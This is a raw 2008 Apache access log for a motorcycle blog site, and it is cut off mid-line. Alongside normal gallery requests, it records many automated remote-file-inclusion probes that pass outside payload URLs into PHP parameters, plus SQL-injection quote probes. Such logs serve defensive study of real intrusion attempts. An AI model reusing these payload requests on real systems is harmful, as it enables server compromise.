213.192.56.18 - - [17/Jun/2008:13:24:10 -0700] "GET /?show=slide&pageid=17&pageid=17 HTTP/1.0" 200 54475 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
62.141.56.36 - - [17/Jun/2008:13:24:12 -0700] "GET /administrator/components/com_virtuemart/admin_files/classes/Log/Log.php?classfile=http://www.fingerxs.eu/modules/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:13:24:34 -0700] "GET /logs/access_080429.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:24:41 -0700] "GET /blog/index.php/category/motorcycles/?show=gallery&nggpage=3 HTTP/1.0" 200 53494 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
62.193.232.188 - - [17/Jun/2008:13:24:50 -0700] "GET /logs//addons/guildbank/searcharrays.php?addonDir=http://www.informatizados.es/docs/info/coi.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "dmulk.com"
62.193.232.188 - - [17/Jun/2008:13:24:50 -0700] "GET /logs//addons/guildbank/searcharrays.php?addonDir=http://www.informatizados.es/docs/info/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
62.193.232.188 - - [17/Jun/2008:13:24:50 -0700] "GET //addons/guildbank/searcharrays.php?addonDir=http://www.informatizados.es/docs/info/coi.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "dmulk.com"
62.193.232.188 - - [17/Jun/2008:13:24:51 -0700] "GET //addons/guildbank/searcharrays.php?addonDir=http://www.informatizados.es/docs/info/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:25:11 -0700] "GET /blog/index.php/2008/06/05/crestoc-2008-5302008-612008/trackback/?show=gallery HTTP/1.0" 200 27605 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:25:40 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=slide HTTP/1.0" 200 9419 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:25:42 -0700] "GET /?show=gallery&pageid=159&nggpage=2&pageid=17&nggpage=2&pageid=17 HTTP/1.0" 200 54816 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:25:44 -0700] "GET /?show=slide&pageid=http%3A%2F%2Fwww.filter-international.com%2Fwebservice%2Faro%2Fpefosi%2F&nggpage=2&pageid=17&nggpage=2&pageid=17&pageid=17 HTTP/1.0" 200 55345 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:25:45 -0700] "GET /?show=slide&pageid=http%3A%2F%2Fwww.filter-international.com%2Fwebservice%2Faro%2Fpefosi%2F&nggpage=2&pageid=17&nggpage=2&pageid=17&pageid=17 HTTP/1.0" 200 55345 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:25:47 -0700] "GET /?show=slide&pageid=http%3A%2F%2Fwww.marsbook.co.kr%2Fmain%2Fcreated%2Fproduct%2F2%2Fmumas%2Fsuvoye%2F&nggpage=2&pageid=17&nggpage=2&pageid=17&pageid=17 HTTP/1.0" 200 55395 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:25:48 -0700] "GET /?show=slide&pageid=159&nggpage=http%3A%2F%2Fwww.winbd.net%2Fadmin%2Fjist_code%2Fwowoz%2Fobowupu%2F&pageid=17&nggpage=2&pageid=17&pageid=17 HTTP/1.0" 200 55330 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:25:50 -0700] "GET /?show=slide&pageid=159&nggpage=http%3A%2F%2Fwww.interkonet.com%2Fgaleria%2Fmodules%2Falbumselect%2Fucu%2Fyixipuz%2F&pageid=17&nggpage=2&pageid=17&pageid=17 HTTP/1.0" 200 55415 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:25:52 -0700] "GET /?show=slide&pageid=159&nggpage=http%3A%2F%2Fwww.service-exposants.com%2Fstore%2Fiyi%2Fzobakiq%2F&pageid=17&nggpage=2&pageid=17&pageid=17 HTTP/1.0" 200 55320 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:25:54 -0700] "GET /?show=slide&pageid=159'&nggpage=2&pageid=17&nggpage=2&pageid=17&pageid=17 HTTP/1.0" 200 55060 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:25:55 -0700] "GET /?show=slide&pageid=159&nggpage=2'&pageid=17&nggpage=2&pageid=17&pageid=17 HTTP/1.0" 200 55060 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:25:57 -0700] "GET /?show=slide&pageid=159&pageid=17&nggpage=3&pageid=17 HTTP/1.0" 200 54700 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:25:59 -0700] "GET /?show=gallery&pageid=17&nggpage=3&pageid=17&nggpage=3&pageid=17 HTTP/1.0" 200 54811 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:26:00 -0700] "GET /?show=slide&pageid=17&pageid=17&pageid=159 HTTP/1.0" 200 54610 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
74.52.139.226 - - [17/Jun/2008:13:26:19 -0700] "GET /logs/index1.php?choix=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [17/Jun/2008:13:26:19 -0700] "GET /index1.php?choix=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.29.147.48 - - [17/Jun/2008:13:26:26 -0700] "GET /logs/index.php?Load=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:26:27 -0700] "GET /blog/index.php/category/motorcycles/?show=gallery&nggpage=3&nggpage=2 HTTP/1.0" 200 53604 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
200.29.147.48 - - [17/Jun/2008:13:26:30 -0700] "GET /index.php?Load=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 200 18411 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:13:26:31 -0700] "GET /logs/index.php?Load=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:13:26:46 -0700] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.27.12.194 - - [17/Jun/2008:13:26:46 -0700] "GET /logs/index1.php?choix=http://nphero.com/go/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.27.12.194 - - [17/Jun/2008:13:26:46 -0700] "GET /index1.php?choix=http://nphero.com/go/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:13:26:47 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.182.191.65 - - [17/Jun/2008:13:26:47 -0700] "GET /logs/index1.php?choix=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.65 - - [17/Jun/2008:13:26:47 -0700] "GET /index1.php?choix=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:13:26:48 -0700] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:13:26:55 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:13:26:55 -0700] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:26:57 -0700] "GET /blog/index.php/2008/06/05/crestoc-2008-5302008-612008/trackback/?show=gallery&nggpage=2 HTTP/1.0" 200 27677 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
210.48.67.39 - - [17/Jun/2008:13:26:57 -0700] "GET /index.php?Load=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 200 18424 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [17/Jun/2008:13:26:58 -0700] "GET /logs/show.php?page=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:13:26:58 -0700] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.139.226 - - [17/Jun/2008:13:26:58 -0700] "GET /show.php?page=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.246.21.243 - - [17/Jun/2008:13:26:58 -0700] "GET /logs/index.php?ort=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:26:59 -0700] "GET /?show=slide&pageid=159&nggpage=2&pageid=17&nggpage=2&pageid=17&pageid=17 HTTP/1.0" 200 55000 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
74.52.139.226 - - [17/Jun/2008:13:26:59 -0700] "GET /logs/index.php?ort=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.27.12.194 - - [17/Jun/2008:13:26:59 -0700] "GET /logs/index1.php?menu=http://nphero.com/go/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.27.12.194 - - [17/Jun/2008:13:26:59 -0700] "GET /index1.php?menu=http://nphero.com/go/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.246.21.243 - - [17/Jun/2008:13:27:01 -0700] "GET /logs/show.php?page=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.246.21.243 - - [17/Jun/2008:13:27:02 -0700] "GET /show.php?page=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.246.21.243 - - [17/Jun/2008:13:27:02 -0700] "GET /index.php?ort=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 200 18439 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.139.226 - - [17/Jun/2008:13:27:02 -0700] "GET /index.php?ort=http://nozyk.org/rob.txt? HTTP/1.1" 200 18363 "-" "libwww-perl/5.810" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:27:02 -0700] "GET /?show=slide&pageid=http%3A%2F%2Fsans-packing.ru%2Fimg%2Fjipeqap%2Fehudute%2F&nggpage=2&pageid=17&nggpage=2&pageid=17&pageid=17&pageid=17 HTTP/1.0" 200 55480 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:27:04 -0700] "GET /?show=slide&pageid=http%3A%2F%2Frabotnitsa.ru%2Fjoomla__%2Fadministrator%2Fbackups%2Farim%2Fzaf%2F&nggpage=2&pageid=17&nggpage=2&pageid=17&pageid=17&pageid=17 HTTP/1.0" 200 55590 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
201.12.149.44 - - [17/Jun/2008:13:27:04 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://tugaspeed.info/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.149.44 - - [17/Jun/2008:13:27:05 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://tugaspeed.info/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:27:05 -0700] "GET /?show=slide&pageid=http%3A%2F%2Fwww.clubnataciotortosa.com%2FUserFiles%2FFile%2Fedut%2Fade%2F&nggpage=2&pageid=17&nggpage=2&pageid=17&pageid=17&pageid=17 HTTP/1.0" 200 55565 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:27:07 -0700] "GET /?show=slide&pageid=159&nggpage=http%3A%2F%2Fwww.heaven-house.kz%2Ftemplates_c%2Fomoj%2Fedexuq%2F&pageid=17&nggpage=2&pageid=17&pageid=17&pageid=17 HTTP/1.0" 200 55530 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
201.12.149.44 - - [17/Jun/2008:13:27:08 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://tugaspeed.info/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:27:09 -0700] "GET /?show=slide&pageid=159&nggpage=http%3A%2F%2Fwww.interkonet.com%2Fgaleria%2Fmodules%2Falbumselect%2Fucu%2Fyixipuz%2F&pageid=17&nggpage=2&pageid=17&pageid=17&pageid=17 HTTP/1.0" 200 55625 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:27:10 -0700] "GET /?show=slide&pageid=159&nggpage=http%3A%2F%2Fstoneproperties.co.uk%2Falbum%2Fincludes%2Fnohul%2Fzojaz%2F&pageid=17&nggpage=2&pageid=17&pageid=17&pageid=17 HTTP/1.0" 200 55565 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:27:12 -0700] "GET /?show=slide&pageid=159'&nggpage=2&pageid=17&nggpage=2&pageid=17&pageid=17&pageid=17 HTTP/1.0" 200 55270 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:27:14 -0700] "GET /?show=slide&pageid=159&nggpage=2'&pageid=17&nggpage=2&pageid=17&pageid=17&pageid=17 HTTP/1.0" 200 55270 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:27:15 -0700] "GET /logs//admin.php?include_path=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:27:15 -0700] "GET /?show=slide&pageid=159&pageid=17&nggpage=3&pageid=17&nggpage=2&pageid=17 HTTP/1.0" 200 54960 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:27:15 -0700] "GET //admin.php?include_path=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:27:17 -0700] "GET /?show=slide&pageid=17&nggpage=3&pageid=17&nggpage=3&pageid=17&pageid=17 HTTP/1.0" 200 54995 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:27:19 -0700] "GET /?show=slide&pageid=17&pageid=17&pageid=159&pageid=17 HTTP/1.0" 200 54760 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
65.182.191.65 - - [17/Jun/2008:13:27:19 -0700] "GET /logs/show.php?page=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.65 - - [17/Jun/2008:13:27:19 -0700] "GET /show.php?page=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.27.12.194 - - [17/Jun/2008:13:27:31 -0700] "GET /logs/show.php?page=http://nphero.com/go/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.27.12.194 - - [17/Jun/2008:13:27:31 -0700] "GET /show.php?page=http://nphero.com/go/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.27.12.194 - - [17/Jun/2008:13:27:33 -0700] "GET /logs/index.php?ort=http://nphero.com/go/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:27:38 -0700] "GET /logs//admin.php?include_path=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:27:38 -0700] "GET //admin.php?include_path=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:13:27:45 -0700] "GET /logs/index1.php?choix=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:13:27:45 -0700] "GET /index1.php?choix=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:27:48 -0700] "GET /blog/index.php/category/motorcycles/?show=gallery&nggpage=3&nggpage=2&nggpage=2 HTTP/1.0" 200 53734 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
64.27.12.194 - - [17/Jun/2008:13:27:48 -0700] "GET /index.php?ort=http://nphero.com/go/on.txt? HTTP/1.1" 200 18374 "-" "libwww-perl/5.811" "www.dmulk.com"
210.120.128.65 - - [17/Jun/2008:13:27:51 -0700] "GET /logs/index.php?incl=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.120.128.65 - - [17/Jun/2008:13:27:51 -0700] "GET /logs/access_080204.log/index.php?incl=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.120.128.65 - - [17/Jun/2008:13:27:51 -0700] "GET /logs/access_080221.log/index.php?incl=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:28:18 -0700] "GET /blog/index.php/2008/06/05/crestoc-2008-5302008-612008/trackback/?show=gallery&nggpage=2&nggpage=3 HTTP/1.0" 200 27765 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
210.120.128.65 - - [17/Jun/2008:13:28:18 -0700] "GET /index.php?incl=http://skill-station.net/help/id5.txt??? HTTP/1.1" 200 18408 "-" "libwww-perl/5.79" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:13:28:18 -0700] "GET /logs/index.php?Load=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:28:19 -0700] "GET /?show=slide&pageid=159&nggpage=2&pageid=17&nggpage=2&pageid=17&pageid=17&pageid=17 HTTP/1.0" 200 55210 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
58.26.137.64 - - [17/Jun/2008:13:28:20 -0700] "GET /index.php?Load=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 200 18423 "-" "libwww-perl/5.69" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:28:21 -0700] "GET /?show=slide&pageid=http%3A%2F%2Fwww.tcmforum.com%2Flayout%2Foxiqade%2Fonese%2F&nggpage=2&pageid=17&nggpage=2&pageid=17&pageid=17&pageid=17&nggpage=3&pageid=17 HTTP/1.0" 200 55810 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:28:23 -0700] "GET /?show=slide&pageid=http%3A%2F%2Frabotnitsa.ru%2Fjoomla__%2Fadministrator%2Fbackups%2Farim%2Fzaf%2F&nggpage=2&pageid=17&nggpage=2&pageid=17&pageid=17&pageid=17&nggpage=3&pageid=17 HTTP/1.0" 200 55910 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:28:24 -0700] "GET /?show=slide&pageid=http%3A%2F%2Fwww.tureksfuar.com.tr%2Fyeni%2Faxiyeba%2Ftebe%2F&nggpage=2&pageid=17&nggpage=2&pageid=17&pageid=17&pageid=17&nggpage=3&pageid=17 HTTP/1.0" 200 55820 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:28:26 -0700] "GET /?show=slide&pageid=159&nggpage=http%3A%2F%2Fwww.landi-sempach-emmen.ch%2Faktionen%2Fimage%2Fzafecez%2Froxovef%2F&pageid=17&nggpage=2&pageid=17&pageid=17&pageid=17&nggpage=3&pageid=17 HTTP/1.0" 200 55930 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:28:27 -0700] "GET /?show=slide&pageid=159&nggpage=http%3A%2F%2Fwww.qualitas1988.com%2Fimages%2Feditor%2F.thumbs%2Fsowem%2Fmudi%2F&pageid=17&nggpage=2&pageid=17&pageid=17&pageid=17&nggpage=3&pageid=17 HTTP/1.0" 200 55920 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:28:29 -0700] "GET /?show=slide&pageid=159&nggpage=http%3A%2F%2Fwww.tcmforum.com%2Flayout%2Foxiqade%2Fonese%2F&pageid=17&nggpage=2&pageid=17&pageid=17&pageid=17&nggpage=3&pageid=17 HTTP/1.0" 200 55820 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:28:31 -0700] "GET /?show=slide&pageid=159'&nggpage=2&pageid=17&nggpage=2&pageid=17&pageid=17&pageid=17&nggpage=3&pageid=17 HTTP/1.0" 200 55590 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:28:32 -0700] "GET /?show=slide&pageid=159&nggpage=2'&pageid=17&nggpage=2&pageid=17&pageid=17&pageid=17&nggpage=3&pageid=17 HTTP/1.0" 200 55590 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:28:34 -0700] "GET /?show=slide&pageid=159&pageid=17&nggpage=3&pageid=17&nggpage=2&pageid=17&nggpage=3&pageid=17 HTTP/1.0" 200 55260 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5